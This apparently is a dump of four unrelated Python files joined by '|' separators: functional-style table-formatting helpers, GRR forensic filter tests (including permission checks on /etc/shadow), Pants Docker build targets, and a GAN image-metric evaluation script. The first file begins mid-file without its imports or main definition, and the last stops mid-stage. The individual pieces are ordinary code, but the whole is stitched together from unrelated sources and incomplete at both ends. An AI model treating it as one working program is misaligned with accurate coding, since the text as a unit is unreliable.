# chunksOf :: Int -> [a] -> [[a]]
def chunksOf(n):
'''A series of lists of length n,
subdividing the contents of xs.
Where the length of xs is not evenly divible,
the final list will be shorter than n.'''
return lambda xs: reduce(
lambda a, i: a + [xs[i:n + i]],
list(range(0, len(xs), n)), []
) if 0 < n else []
# compose (<<<) :: (b -> c) -> (a -> b) -> a -> c
def compose(g):
'''Right to left function composition.'''
return lambda f: lambda x: g(f(x))
# fst :: (a, b) -> a
def fst(tpl):
'''First member of a pair.'''
return tpl[0]
# readFile :: FilePath -> IO String
def readFile(fp):
'''The contents of any file at the path
derived by expanding any ~ in fp.'''
with open(expanduser(fp), 'r', encoding='utf-8') as f:
return f.read()
# paddedMatrix :: a -> [[a]] -> [[a]]
def paddedMatrix(v):
''''A list of rows padded to equal length
(where needed) with instances of the value v.'''
def go(rows):
return paddedRows(
len(max(rows, key=len))
)(v)(rows)
return lambda rows: go(rows) if rows else []
# paddedRows :: Int -> a -> [[a]] -[[a]]
def paddedRows(n):
'''A list of rows padded (but never truncated)
to length n with copies of value v.'''
def go(v, xs):
def pad(x):
d = n - len(x)
return (x + list(repeat(v, d))) if 0 < d else x
return list(map(pad, xs))
return lambda v: lambda xs: go(v, xs) if xs else []
# showColumns :: Int -> [String] -> String
def showColumns(n):
'''A column-wrapped string
derived from a list of rows.'''
def go(xs):
def fit(col):
w = len(max(col, key=len))
def pad(x):
return x.ljust(4 + w, ' ')
return ''.join(map(pad, col)).rstrip()
q, r = divmod(len(xs), n)
return '\n'.join(map(
fit,
list(zip(*paddedMatrix('')(
chunksOf(q + int(bool(r)))(xs)
)))
))
return lambda xs: go(xs)
# snd :: (a, b) -> b
def snd(tpl):
'''Second member of a pair.'''
return tpl[1]
# stet :: a -> a
def stet(x):
'''The identity function.
The usual 'id' is reserved in Python.'''
return x
# swap :: (a, b) -> (b, a)
def swap(tpl):
'''The swapped components of a pair.'''
return (tpl[1], tpl[0])
# tabulated :: String -> (a -> String) ->
# (b -> String) ->
# Int ->
# (a -> b) -> [a] -> String
def tabulated(s):
'''Heading -> x display function -> fx display function ->
number of columns -> f -> value list -> tabular string.'''
def go(xShow, fxShow, intCols, f, xs):
def mxw(fshow, g):
return max(list(map(compose(len)(fshow), list(map(g, xs)))))
w = mxw(xShow, lambda x: x)
fw = mxw(fxShow, f)
return s + '\n' + showColumns(intCols)([
xShow(x).rjust(w, ' ') + ' -> ' + (
fxShow(f(x)).rjust(fw, ' ')
)
for x in xs
])
return lambda xShow: lambda fxShow: lambda nCols: (
lambda f: lambda xs: go(
xShow, fxShow, nCols, f, xs
)
)
# MAIN ---
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
"""Tests for grr.server.checks.filters."""
import collections
from grr.lib import flags
from grr.lib.rdfvalues import anomaly
from grr.lib.rdfvalues import client as rdf_client
from grr.lib.rdfvalues import paths as rdf_paths
from grr.lib.rdfvalues import protodict as rdf_protodict
from grr.server.checks import checks
from grr.server.checks import filters
from grr.test_lib import test_lib
# Just a named tuple that can be used to test objectfilter expressions.
Sample = collections.namedtuple("Sample", ["x", "y"])
class BaseFilterTests(test_lib.GRRBaseTest):
"""Test base filter methods and operations."""
def testEnforceList(self):
filt = filters.Filter()
self.assertRaises(filters.ProcessingError, filt.Parse, "not_a_list", False)
def testValidate(self):
filt = filters.Filter()
self.assertRaises(NotImplementedError, filt.Validate, "anything")
def testParse(self):
filt = filters.Filter()
self.assertRaises(NotImplementedError, filt.Parse, [], "do nothing")
class AttrFilterTests(test_lib.GRRBaseTest):
"""Test attribute filter methods and operations."""
def testValidate(self):
filt = filters.AttrFilter()
self.assertRaises(filters.DefinitionError, filt.Validate, " ")
self.assertFalse(filt.Validate("cfg1"))
self.assertFalse(filt.Validate("cfg1 cfg1.test1"))
def testParse(self):
filt = filters.AttrFilter()
hit1 = rdf_protodict.AttributedDict(k1="hit1", k2="found1", k3=[3, 4])
hit2 = rdf_protodict.AttributedDict(k1="hit2", k2="found2")
meta = rdf_protodict.AttributedDict(one=hit1, two=hit2)
objs = [hit1, hit2, meta]
results = filt.Parse(objs, "k1 k2 one.k3")
self.assertEqual(5, len(results))
r1, r2, r3, r4, r5 = results
self.assertEqual("k1", r1.key)
self.assertEqual("hit1", r1.value)
self.assertEqual("k1", r2.key)
self.assertEqual("hit2", r2.value)
self.assertEqual("k2", r3.key)
self.assertEqual("found1", r3.value)
self.assertEqual("k2", r4.key)
self.assertEqual("found2", r4.value)
self.assertEqual("one.k3", r5.key)
self.assertEqual([3, 4], r5.value)
class ItemFilterTests(test_lib.GRRBaseTest):
"""Test item filter methods and operations."""
def testParse(self):
filt = filters.ItemFilter()
one = rdf_protodict.AttributedDict(test1="1", test2=[2, 3])
foo = rdf_protodict.AttributedDict(test1="foo", test2=["bar", "baz"])
fs = rdf_client.Filesystem(device="/dev/sda1", mount_point="/root")
objs = [one, foo, fs]
results = filt.Parse(objs, "test1 is '1'")
self.assertEqual(1, len(results))
self.assertEqual("test1", results[0].key)
self.assertEqual("1", results[0].value)
results = filt.Parse(objs, "test1 is '2'")
self.assertFalse(results)
results = filt.Parse(objs, "test2 contains 3")
self.assertEqual(1, len(results))
self.assertEqual("test2", results[0].key)
self.assertEqual([2, 3], results[0].value)
results = filt.Parse(objs, "test1 is '1' or test1 contains 'foo'")
self.assertEqual(2, len(results))
self.assertEqual("test1", results[0].key)
self.assertEqual("1", results[0].value)
self.assertEqual("test1", results[1].key)
self.assertEqual("foo", results[1].value)
results = filt.Parse(objs, "mount_point is '/root'")
self.assertEqual(1, len(results))
self.assertEqual("mount_point", results[0].key)
self.assertEqual("/root", results[0].value)
class ForEachTests(test_lib.GRRBaseTest):
"""Test ForEach filter methods and operations."""
def testValidate(self):
filt = filters.ForEach()
self.assertRaises(filters.DefinitionError, filt.Validate, " ")
self.assertRaises(filters.DefinitionError, filt.Validate, "attr1 attr2")
self.assertFalse(filt.Validate("attr1"))
def testParse(self):
filt = filters.ForEach()
hit1 = rdf_protodict.AttributedDict(k1="v1", k2="v2", k3="v3")
hit2 = rdf_protodict.AttributedDict(k1="v4", k2="v5", k3="v6")
meta = rdf_protodict.AttributedDict(
foo=["foo", "bar"], target=[hit1, hit2], null=[])
objs = [meta]
results = filt.Parse(objs, "target")
self.assertEqual(2, len(results))
self.assertItemsEqual([hit1, hit2], [r.item for r in results])
results = filt.Parse(objs, "foo")
self.assertEqual(2, len(results))
self.assertItemsEqual(["foo", "bar"], [r.item for r in results])
results = filt.Parse(objs, "null")
self.assertEqual(0, len(results))
class ObjectFilterTests(test_lib.GRRBaseTest):
"""Test object filter methods and operations."""
def testValidate(self):
filt = filters.ObjectFilter()
self.assertRaises(filters.DefinitionError, filt.Validate, "bad term")
self.assertFalse(filt.Validate("test is 'ok'"))
def testParse(self):
filt = filters.ObjectFilter()
hit1 = rdf_protodict.AttributedDict(test="hit1")
hit2 = rdf_protodict.AttributedDict(test="hit2")
miss = rdf_protodict.AttributedDict(test="miss")
objs = [hit1, hit2, miss]
results = filt.Parse(objs, "test is 'hit1'")
self.assertItemsEqual([hit1], results)
results = filt.Parse(objs, "test is 'hit2'")
self.assertItemsEqual([hit2], results)
results = filt.Parse(objs, "test inset 'hit1,hit2'")
self.assertItemsEqual([hit1, hit2], results)
class RDFFilterTests(test_lib.GRRBaseTest):
"""Test rdf filter methods and operations."""
def testValidate(self):
filt = filters.RDFFilter()
self.assertFalse(filt.Validate("KnowledgeBase,AttributedDict"))
self.assertRaises(filters.DefinitionError, filt.Validate,
"KnowledgeBase,Nonexistent")
def testParse(self):
filt = filters.RDFFilter()
cfg = rdf_protodict.AttributedDict()
anom = anomaly.Anomaly()
objs = [cfg, anom]
results = filt.Parse(objs, "KnowledgeBase")
self.assertFalse(results)
results = filt.Parse(objs, "AttributedDict,KnowledgeBase")
self.assertItemsEqual([cfg], results)
results = filt.Parse(objs, "Anomaly,AttributedDict,KnowledgeBase")
self.assertItemsEqual(objs, results)
class StatFilterTests(test_lib.GRRBaseTest):
"""Test stat filter methods and operations."""
bad_null = ["", " :"]
bad_file = ["file_re:[[["]
bad_gids = ["gid: ", "gid 0", "gid:0", "gid:=", "gid:gid:"]
bad_mode = ["mode 755", "mode:755", "mode:0999", "mode:0777,0775"]
bad_mask = ["mask 755", "mask:755", "mask:0999", "mask:0777,0775"]
bad_path = ["path_re:[[["]
bad_type = [
"file_type: ", "file_type foo", "file_type:foo",
"file_type:directory,regular"
]
bad_uids = ["uid: ", "uid 0", "uid:0", "uid:=", "uid:gid:"]
badness = [
bad_null, bad_file, bad_gids, bad_mask, bad_mode, bad_path, bad_type,
bad_uids
]
ok_file = ["file_re:/etc/passwd"]
ok_gids = ["gid:=0", "gid:=1,>1,<1,>=1,<=1,!1"]
ok_mode = ["mode:0002"]
ok_mask = ["mode:1002"]
ok_path = ["path_re:/home/*"]
ok_type = ["file_type:REGULAR", "file_type:directory"]
ok_uids = ["uid:=0", "uid:=1,>1,<1,>=1,<=1,!1"]
just_fine = [ok_file, ok_gids, ok_mask, ok_mode, ok_path, ok_type, ok_uids]
def _GenStat(self,
path="/etc/passwd",
st_mode=33184,
st_ino=1063090,
st_dev=64512L,
st_nlink=1,
st_uid=1001,
st_gid=5000,
st_size=1024,
st_atime=1336469177,
st_mtime=1336129892,
st_ctime=1336129892):
"""Generate a StatEntry RDF value."""
pathspec = rdf_paths.PathSpec(
path=path, pathtype=rdf_paths.PathSpec.PathType.OS)
return rdf_client.StatEntry(
pathspec=pathspec,
st_mode=st_mode,
st_ino=st_ino,
st_dev=st_dev,
st_nlink=st_nlink,
st_uid=st_uid,
st_gid=st_gid,
st_size=st_size,
st_atime=st_atime,
st_mtime=st_mtime,
st_ctime=st_ctime)
def testValidate(self):
filt = filters.StatFilter()
for params in self.badness:
for bad in params:
self.assertRaises(filters.DefinitionError, filt.Validate, bad)
for params in self.just_fine:
for ok in params:
self.assertTrue(filt.Validate(ok), "Rejected valid expression: %s" % ok)
def testFileTypeParse(self):
"""FileType filters restrict results to specified file types."""
all_types = {
"BLOCK": self._GenStat(st_mode=24992), # 0060640
"Character": self._GenStat(st_mode=8608), # 0020640
"directory": self._GenStat(st_mode=16873), # 0040751
"fiFO": self._GenStat(st_mode=4534), # 0010666
"REGULAR": self._GenStat(st_mode=33204), # 0100664
"socket": self._GenStat(st_mode=49568), # 0140640
"SymLink": self._GenStat(st_mode=41471)
} # 0120777
filt = filters.StatFilter()
for file_type, expected in all_types.iteritems():
filt._Flush()
results = filt.Parse(all_types.values(), "file_type:%s" % file_type)
self.assertEqual(1, len(results), "Expected exactly 1 %s" % file_type)
self.assertEqual(expected, results[0],
"Expected stat %s, got %s" % (expected, results[0]))
def testFileREParse(self):
"""File regexes operate successfully."""
filt = filters.StatFilter()
obj1 = self._GenStat(path="/etc/passwd")
obj2 = self._GenStat(path="/etc/alternatives/ssh-askpass")
obj3 = self._GenStat(path="/etc/alternatives/ssh-askpass.1.gz")
objs = [obj1, obj2, obj3]
results = filt.Parse(objs, "file_re:pass")
self.assertItemsEqual(objs, results)
results = filt.Parse(objs, "file_re:pass$")
self.assertItemsEqual([obj2], results)
results = filt.Parse(objs, "file_re:^pass")
self.assertItemsEqual([obj1], results)
def testPathREParse(self):
"""Path regexes operate successfully."""
filt = filters.StatFilter()
obj1 = self._GenStat(path="/etc/passwd")
obj2 = self._GenStat(path="/etc/alternatives/ssh-askpass")
obj3 = self._GenStat(path="/etc/alternatives/ssh-askpass.1.gz")
objs = [obj1, obj2, obj3]
results = filt.Parse(objs, "path_re:/etc/*")
self.assertItemsEqual(objs, results)
results = filt.Parse(objs, "path_re:alternatives")
self.assertItemsEqual([obj2, obj3], results)
results = filt.Parse(objs, "path_re:alternatives file_re:pass$")
self.assertItemsEqual([obj2], results)
def testGIDParse(self):
"""GID comparisons operate successfully."""
filt = filters.StatFilter()
obj1 = self._GenStat(st_gid=0)
obj2 = self._GenStat(st_gid=500)
obj3 = self._GenStat(st_gid=5000)
objs = [obj1, obj2, obj3]
results = filt.Parse(objs, "gid:=0")
self.assertItemsEqual([obj1], results)
results = filt.Parse(objs, "gid:>=0")
self.assertItemsEqual(objs, results)
results = filt.Parse(objs, "gid:>0")
self.assertItemsEqual([obj2, obj3], results)
results = filt.Parse(objs, "gid:>0,<=5000")
self.assertItemsEqual([obj2, obj3], results)
results = filt.Parse(objs, "gid:>0,<5000")
self.assertItemsEqual([obj2], results)
results = filt.Parse(objs, "gid:!5000")
self.assertItemsEqual([obj1, obj2], results)
def testUIDParse(self):
"""UID comparisons operate successfully."""
filt = filters.StatFilter()
obj1 = self._GenStat(st_uid=1001)
obj2 = self._GenStat(st_uid=5000)
objs = [obj1, obj2]
results = filt.Parse(objs, "uid:=0")
self.assertFalse(results)
results = filt.Parse(objs, "uid:=1001")
self.assertItemsEqual([obj1], results)
results = filt.Parse(objs, "uid:>=0")
self.assertItemsEqual(objs, results)
results = filt.Parse(objs, "uid:>0")
self.assertItemsEqual(objs, results)
results = filt.Parse(objs, "uid:>0,<=5000")
self.assertItemsEqual(objs, results)
results = filt.Parse(objs, "uid:>0,<5000")
self.assertItemsEqual([obj1], results)
results = filt.Parse(objs, "uid:!5000")
self.assertItemsEqual([obj1], results)
def testPermissionsParse(self):
"""Permissions comparisons operate successfully."""
filt = filters.StatFilter()
obj1 = self._GenStat(st_mode=0100740)
obj2 = self._GenStat(st_mode=0100755)
objs = [obj1, obj2]
results = filt.Parse(objs, "mode:0644")
self.assertFalse(results)
results = filt.Parse(objs, "mode:0740")
self.assertItemsEqual([obj1], results)
results = filt.Parse(objs, "mode:0640 mask:0640")
self.assertItemsEqual(objs, results)
results = filt.Parse(objs, "mode:0014 mask:0014")
self.assertItemsEqual([obj2], results)
def testParseFileObjs(self):
"""Multiple file types are parsed successfully."""
filt = filters.StatFilter()
ok = self._GenStat(path="/etc/shadow", st_uid=0, st_gid=0, st_mode=0100640)
link = self._GenStat(
path="/etc/shadow", st_uid=0, st_gid=0, st_mode=0120640)
user = self._GenStat(
path="/etc/shadow", st_uid=1000, st_gid=1000, st_mode=0100640)
writable = self._GenStat(
path="/etc/shadow", st_uid=0, st_gid=0, st_mode=0100666)
cfg = {"path": "/etc/shadow", "st_uid": 0, "st_gid": 0, "st_mode": 0100640}
invalid = rdf_protodict.AttributedDict(**cfg)
objs = [ok, link, user, writable, invalid]
results = filt.Parse(objs, "uid:>=0 gid:>=0")
self.assertItemsEqual([ok, link, user, writable], results)
results = filt.Parse(objs, "uid:=0 mode:0440 mask:0440")
self.assertItemsEqual([ok, link, writable], results)
results = filt.Parse(objs, "uid:=0 mode:0440 mask:0444")
self.assertItemsEqual([ok, link], results)
results = list(
filt.Parse(objs, "uid:=0 mode:0440 mask:0444 file_type:regular"))
self.assertItemsEqual([ok], results)
class FilterRegistryTests(test_lib.GRRBaseTest):
"""Test filter methods and operations."""
def testFilterRegistry(self):
filters.Filter.filters = {}
filt = filters.Filter.GetFilter("Filter")
# It should be the right type of filter.
# And should be in the registry already.
self.assertIsInstance(filt, filters.Filter)
# The registry must never give the same object to multiple callers.
self.assertNotEqual(filt, filters.Filter.GetFilter("Filter"))
filt = filters.Filter.GetFilter("ObjectFilter")
self.assertIsInstance(filt, filters.ObjectFilter)
self.assertNotEqual(filt, filters.Filter.GetFilter("ObjectFilter"))
filt = filters.Filter.GetFilter("RDFFilter")
self.assertIsInstance(filt, filters.RDFFilter)
self.assertNotEqual(filt, filters.Filter.GetFilter("RDFFilter"))
filters.Filter.filters = {}
self.assertRaises(filters.DefinitionError, filters.Filter.GetFilter, "???")
class HandlerTests(test_lib.GRRBaseTest):
"""Test handler operations."""
def setUp(self):
super(HandlerTests, self).setUp()
fx0 = checks.Filter({"type": "ObjectFilter", "expression": "x == 0"})
fy0 = checks.Filter({"type": "ObjectFilter", "expression": "y == 0"})
bad = checks.Filter({"type": "ObjectFilter", "expression": "y =="})
self.ok = [fx0, fy0]
self.bad = [fx0, fy0, bad]
self.all = [Sample(0, 0), Sample(0, 1), Sample(1, 0), Sample(1, 1)]
def GetFilters(self, filt_defs):
"""Initialize one or more filters as if they were contained in a probe."""
# The artifact isn't actually used for anything, it's just required to
# initialize handlers.
probe = checks.Probe(artifact="Data", filters=filt_defs)
return probe.filters
def testValidateFilters(self):
self.assertEquals(2, len(self.GetFilters(self.ok)))
self.assertRaises(filters.DefinitionError, self.GetFilters, self.bad)
def testBaseHandler(self):
# Handler needs an artifact.
self.assertRaises(filters.DefinitionError, filters.BaseHandler)
h = filters.BaseHandler("STUB")
self.assertRaises(NotImplementedError, h.Parse, "STUB")
def testNoOpHandler(self):
h = filters.GetHandler("PASSTHROUGH")
handler = h("Data", filters=self.GetFilters(self.ok))
self.assertItemsEqual(self.all, handler.Parse(self.all))
def testParallelHandler(self):
h = filters.GetHandler("PARALLEL")
# Without filters.
handler = h("Data", filters=[])
self.assertItemsEqual(self.all, handler.Parse(self.all))
# With filters.
handler = h("Data", filters=self.GetFilters(self.ok))
expected = [Sample(0, 0), Sample(0, 1), Sample(1, 0)]
self.assertItemsEqual(expected, handler.Parse(self.all))
def testSerialHandler(self):
h = filters.GetHandler("SERIAL")
# Without filters.
handler = h("Data", filters=[])
self.assertItemsEqual(self.all, handler.Parse(self.all))
# With filters.
handler = h("Data", filters=self.GetFilters(self.ok))
expected = [Sample(0, 0)]
self.assertItemsEqual(expected, handler.Parse(self.all))
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
flags.StartMain(main)
|
from __future__ import absolute_import
from pants.base.build_environment import get_scm
from pants.base.payload import Payload
from pants.base.payload_field import PrimitiveField
from pants.build_graph.target import Target
class DockerTargetBase(Target):
def __init__(self, address=None, payload=None, image_name=None, image_tag=None, **kwargs):
payload = payload or Payload()
payload.add_fields({
'image_name': PrimitiveField(image_name),
'image_tag': PrimitiveField('c' + get_scm().commit_id)
})
self.image_name = image_name
self.image_tag = image_tag
super(DockerTargetBase, self).__init__(address=address, payload=payload, **kwargs)
class DockerBundleTarget(DockerTargetBase):
def __init__(self, base_image=None, payload=None, **kwargs):
payload = payload or Payload()
payload.add_fields({
'base_image': PrimitiveField(base_image)
})
self.base_image = base_image
super(DockerBundleTarget, self).__init__(payload=payload, **kwargs)
class DockerJvmAppTarget(DockerBundleTarget):
pass
class DockerPythonTarget(DockerBundleTarget):
pass
|
from __future__ import print_function
import os, pdb, sys, glob
# we need to set GPUno first, otherwise may out of memory
stage = int(sys.argv[1])
gpuNO = sys.argv[2]
model_dir = sys.argv[3]
test_dir = sys.argv[4]
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=str(gpuNO)
import StringIO
import scipy.misc
import numpy as np
from skimage.measure import compare_ssim as ssim
from skimage.measure import compare_psnr as psnr
from skimage.color import rgb2gray
# from PIL import Image
import scipy.misc
import tflib
import tflib.inception_score
def l1_mean_dist(x,y):
# return np.sum(np.abs(x-y))
diff = x.astype(float)-y.astype(float)
return np.sum(np.abs(diff))/np.product(x.shape)
def l2_mean_dist(x,y):
# return np.sqrt(np.sum((x-y)**2))
diff = x.astype(float)-y.astype(float)
return np.sqrt(np.sum(diff**2))/np.product(x.shape)
# pdb.set_trace()
if 1==stage:
test_result_dir_x = os.path.join(model_dir, test_dir, 'x_target')
# test_result_dir_x = os.path.join(model_dir, test_dir, 'x')
test_result_dir_G = os.path.join(model_dir, test_dir, 'G')
test_result_dir_mask = os.path.join(model_dir, test_dir, 'mask')
score_path = os.path.join(model_dir, test_dir, 'score_mask.txt')
types = ('*.jpg', '*.png') # the tuple of file types
x_files = []
G_files = []
mask_files = []
for files in types:
x_files.extend(glob.glob(os.path.join(test_result_dir_x, files)))
G_files.extend(glob.glob(os.path.join(test_result_dir_G, files)))
mask_files.extend(glob.glob(os.path.join(test_result_dir_mask, files)))
x_target_list = []
for path in x_files:
x_target_list.append(scipy.misc.imread(path))
G_list = []
for path in G_files:
G_list.append(scipy.misc.imread(path))
mask_target_list = []
for path in mask_files:
mask_target_list.append(scipy.misc.imread(path))
N = len(G_files)
##################### SSIM ##################
ssim_G_x = []
psnr_G_x = []
L1_mean_G_x = []
L2_mean_G_x = []
# x_0_255 = utils_wgan.unprocess_image(x_fixed, 127.5, 127.5)
x_0_255 = x_target_list
for i in xrange(N):
# G_gray = rgb2gray((G_list[i]/127.5-1).clip(min=-1,max=1))
# x_target_gray = rgb2gray((x_target_list[i]/127.5-1).clip(min=-1,max=1))
# gray image, [0,1]
# G_gray = rgb2gray((G_list[i]).clip(min=0,max=255))
# x_target_gray = rgb2gray((x_target_list[i]).clip(min=0,max=255))
# ssim_G_x.append(ssim(G_gray, x_target_gray, data_range=x_target_gray.max()-x_target_gray.min(), multichannel=False))
# psnr_G_x.append(psnr(im_true=x_target_gray, im_test=G_gray, data_range=x_target_gray.max()-x_target_gray.min()))
# L1_mean_G_x.append(l1_mean_dist(G_gray, x_target_gray))
# L2_mean_G_x.append(l2_mean_dist(G_gray, x_target_gray))
# color image
# ssim_G_x.append(ssim(G_list[i], x_target_list[i], multichannel=True))
masked_G_array = np.uint8(mask_target_list[i][:,:,np.newaxis]/255.*G_list[i])
masked_x_target_array = np.uint8(mask_target_list[i][:,:,np.newaxis]/255.*x_target_list[i])
ssim_G_x.append(ssim(masked_G_array, masked_x_target_array, multichannel=True))
psnr_G_x.append(psnr(im_true=masked_x_target_array, im_test=masked_G_array))
L1_mean_G_x.append(l1_mean_dist(masked_G_array, masked_x_target_array))
L2_mean_G_x.append(l2_mean_dist(masked_G_array, masked_x_target_array))
# pdb.set_trace()
ssim_G_x_mean = np.mean(ssim_G_x)
ssim_G_x_std = np.std(ssim_G_x)
psnr_G_x_mean = np.mean(psnr_G_x)
psnr_G_x_std = np.std(psnr_G_x)
L1_G_x_mean = np.mean(L1_mean_G_x)
L1_G_x_std = np.std(L1_mean_G_x)
L2_G_x_mean = np.mean(L2_mean_G_x)
L2_G_x_std = np.std(L2_mean_G_x)
print('ssim_G_x_mean: %f\n' % ssim_G_x_mean)
print('ssim_G_x_std: %f\n' % ssim_G_x_std)
print('psnr_G_x_mean: %f\n' % psnr_G_x_mean)
print('psnr_G_x_std: %f\n' % psnr_G_x_std)
print('L1_G_x_mean: %f\n' % L1_G_x_mean)
print('L1_G_x_std: %f\n' % L1_G_x_std)
print('L2_G_x_mean: %f\n' % L2_G_x_mean)
print('L2_G_x_std: %f\n' % L2_G_x_std)
# ##################### Inception score ##################
# # IS_G_mean, IS_G_std = tflib.inception_score.get_inception_score(G_list)
# G_list_masked = [np.uint8(mask_target_list[i][:,:,np.newaxis]/255.*G_list[i]) for i in range(len(G_list))]
# IS_G_mean, IS_G_std = tflib.inception_score.get_inception_score(G_list_masked)
# print('IS_G_mean: %f\n' % IS_G_mean)
# print('IS_G_std: %f\n' % IS_G_std)
# with open(score_path, 'w') as f:
# f.write('Image number: %d\n' % N)
# f.write('ssim: %.5f +- %.5f ' % (ssim_G_x_mean, ssim_G_x_std))
# f.write('IS: %.5f +- %.5f ' % (IS_G_mean, IS_G_std))
# f.write('psnr: %.5f +- %.5f ' % (psnr_G_x_mean, psnr_G_x_std))
# f.write('L1: %.5f +- %.5f ' % (L1_G_x_mean, L1_G_x_std))
# f.write('L2: %.5f +- %.5f' % (L2_G_x_mean, L2_G_x_std))
## IS of fake data
G_list_masked = [np.uint8(mask_target_list[i][:,:,np.newaxis]/255.*G_list[i]) for i in range(len(G_list))]
IS_G_mean, IS_G_std = tflib.inception_score.get_inception_score(G_list_masked)
print('IS_G_mean: %f\n' % IS_G_mean)
print('IS_G_std: %f\n' % IS_G_std)
with open(score_path, 'w') as f:
f.write('Image number: %d\n' % N)
f.write('IS: %.5f +- %.5f ' % (IS_G_mean, IS_G_std))
## IS of real data
# x_target_list_masked = [np.uint8(mask_target_list[i][:,:,np.newaxis]/255.*x_target_list[i]) for i in range(len(x_target_list))]
# IS_G_mean, IS_G_std = tflib.inception_score.get_inception_score(x_target_list_masked)
# print('IS_G_mean: %f\n' % IS_G_mean)
# print('IS_G_std: %f\n' % IS_G_std)
# with open(score_path+'_x_target', 'w') as f:
# f.write('Image number: %d\n' % N)
# f.write('IS: %.5f +- %.5f ' % (IS_G_mean, IS_G_std))
elif 2==stage:
test_result_dir_x = os.path.join(model_dir, test_dir, 'x_target')
test_result_dir_G1 = os.path.join(model_dir, test_dir, 'G1')
test_result_dir_G2 = os.path.join(model_dir, test_dir, 'G2')
test_result_dir_mask = os.path.join(model_dir, test_dir, 'mask')
score_path = os.path.join(model_dir, test_dir, 'score_mask.txt') #
types = ('*.jpg', '*.png') # the tuple of file types
x_files = []
G1_files = []
G2_files = []
mask_files = []
for files in types:
x_files.extend(glob.glob(os.path.join(test_result_dir_x, files)))
G1_files.extend(glob.glob(os.path.join(test_result_dir_G1, files)))
G2_files.extend(glob.glob(os.path.join(test_result_dir_G2, files)))
mask_files.extend(glob.glob(os.path.join(test_result_dir_mask, files)))
x_target_list = []
for path in x_files:
x_target_list.append(scipy.misc.imread(path))
G1_list = []
for path in G1_files:
G1_list.append(scipy.misc.imread(path))
G2_list = []
for path in G2_files:
G2_list.append(scipy.misc.imread(path))
mask_target_list = []
for path in mask_files:
mask_target_list.append(scipy.misc.imread(path))
##################### SSIM G1 ##################
N = len(x_files)
ssim_G_x = []
psnr_G_x = []
L1_mean_G_x = []
L2_mean_G_x = []
# x_0_255 = utils_wgan.unprocess_image(x_fixed, 127.5, 127.5)
# x_0_255 = x_target_list
for i in xrange(N):
# G1_gray = rgb2gray((G1_list[i]/127.5-1).clip(min=-1,max=1))
# x_target_gray = rgb2gray((x_target_list[i]/127.5-1).clip(min=-1,max=1))
# gray image, [0,1]
# G1_gray = rgb2gray((G1_list[i]).clip(min=0,max=255))
# x_target_gray = rgb2gray((x_target_list[i]).clip(min=0,max=255))
# ssim_G_x.append(ssim(G_gray, x_target_gray, data_range=x_target_gray.max()-x_target_gray.min(), multichannel=False))
# psnr_G_x.append(psnr(im_true=x_target_gray, im_test=G1_gray, data_range=x_target_gray.max()-x_target_gray.min()))
# L1_mean_G_x.append(l1_mean_dist(G1_gray, x_target_gray))
# L2_mean_G_x.append(l2_mean_dist(G1_gray, x_target_gray))
# color image
# ssim_G_x.append(ssim(G1_list[i], x_target_list[i], multichannel=True))
masked_G1_array = np.uint8(mask_target_list[i][:,:,np.newaxis]/255.*G1_list[i])
masked_x_target_array = np.uint8(mask_target_list[i][:,:,np.newaxis]/255.*x_target_list[i])
ssim_G_x.append(ssim(masked_G1_array, masked_x_target_array, multichannel=True))
psnr_G_x.append(psnr(im_true=masked_x_target_array, im_test=masked_G1_array))
L1_mean_G_x.append(l1_mean_dist(masked_G1_array, masked_x_target_array))
L2_mean_G_x.append(l2_mean_dist(masked_G1_array, masked_x_target_array))
# pdb.set_trace()
ssim_G1_x_mean = np.mean(ssim_G_x)
ssim_G1_x_std = np.std(ssim_G_x)
psnr_G1_x_mean = np.mean(psnr_G_x)
psnr_G1_x_std = np.std(psnr_G_x)
L1_G1_x_mean = np.mean(L1_mean_G_x)
L1_G1_x_std = np.std(L1_mean_G_x)
L2_G1_x_mean = np.mean(L2_mean_G_x)
L2_G1_x_std = np.std(L2_mean_G_x)
print('ssim_G1_x_mean: %f\n' % ssim_G1_x_mean)
print('ssim_G1_x_std: %f\n' % ssim_G1_x_std)
print('psnr_G1_x_mean: %f\n' % psnr_G1_x_mean)
print('psnr_G1_x_std: %f\n' % psnr_G1_x_std)
print('L1_G1_x_mean: %f\n' % L1_G1_x_mean)
print('L1_G1_x_std: %f\n' % L1_G1_x_std)
print('L2_G1_x_mean: %f\n' % L2_G1_x_mean)
print('L2_G1_x_std: %f\n' % L2_G1_x_std)
##################### SSIM G2 ##################
N = len(x_files)
ssim_G_x = []
psnr_G_x = []
L1_mean_G_x = []
L2_mean_G_x = []
# x_0_255 = utils_wgan.unprocess_image(x_fixed, 127.5, 127.5)
# x_0_255 = x_target_list
for i in xrange(N):
# G2_gray = rgb2gray((G2_list[i]/127.5-1).clip(min=-1,max=1))
# x_target_gray = rgb2gray((x_target_list[i]/127.5-1).clip(min=-1,max=1))
# gray image, [0,1]
# G2_gray = rgb2gray((G2_list[i]).clip(min=0,max=255))
# x_target_gray = rgb2gray((x_target_list[i]).clip(min=0,max=255))
# ssim_G_x.append(ssim(G_gray, x_target_gray, data_range=x_target_gray.max()-x_target_gray.min(), multichannel=False))
# psnr_G_x.append(psnr(im_true=x_target_gray, im_test=G2_gray, data_range=x_target_gray.max()-x_target_gray.min()))
# L1_mean_G_x.append(l1_mean_dist(G2_gray, x_target_gray))
# L2_mean_G_x.append(l2_mean_dist(G2_gray, x_target_gray))
# color image
# ssim_G_x.append(ssim(G2_list[i], x_target_list[i], multichannel=True))
masked_G2_array = np.uint8(mask_target_list[i][:,:,np.newaxis]/255.*G2_list[i])
masked_x_target_array = np.uint8(mask_target_list[i][:,:,np.newaxis]/255.*x_target_list[i])
ssim_G_x.append(ssim(masked_G2_array, masked_x_target_array, multichannel=True))
psnr_G_x.append(psnr(im_true=masked_x_target_array, im_test=masked_G2_array))
L1_mean_G_x.append(l1_mean_dist(masked_G2_array, masked_x_target_array))
L2_mean_G_x.append(l2_mean_dist(masked_G2_array, masked_x_target_array))
# pdb.set_trace()
ssim_G2_x_mean = np.mean(ssim_G_x)
ssim_G2_x_std = np.std(ssim_G_x)
psnr_G2_x_mean = np.mean(psnr_G_x)
psnr_G2_x_std = np.std(psnr_G_x)
L1_G2_x_mean = np.mean(L1_mean_G_x)
L1_G2_x_std = np.std(L1_mean_G_x)
L2_G2_x_mean = np.mean(L2_mean_G_x)
L2_G2_x_std = np.std(L2_mean_G_x)
print('ssim_G2_x_mean: %f\n' % ssim_G2_x_mean)
